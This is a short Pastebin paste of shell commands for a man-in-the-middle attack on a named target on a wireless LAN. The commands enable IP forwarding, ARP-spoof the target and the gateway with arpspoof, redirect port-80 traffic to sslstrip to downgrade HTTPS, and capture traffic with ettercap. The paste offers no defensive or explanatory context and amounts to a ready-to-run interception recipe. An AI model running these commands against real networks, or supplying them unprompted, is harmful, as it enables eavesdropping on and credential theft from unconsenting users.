Advertisement
Guest User

g0tmi1k

a guest
Jul 10th, 2009
348
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.36 KB | None | 0 0
  1. # Targets IP: 192.168.1.6
  2. # Gateway : 192.168.1.1
  3. # Interface : wlan0
  4.  
  5. kate /etc/etter.conf
  6. # EDIT - UNCOMMENT - if you use iptables:
  7.  
  8. echo 1 > /proc/sys/net/ipv4/ip_forward
  9. arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
  10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  11.  
  12. sslstrip -a -k -f
  13.  
  14. ettercap -T -q -i wlan0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement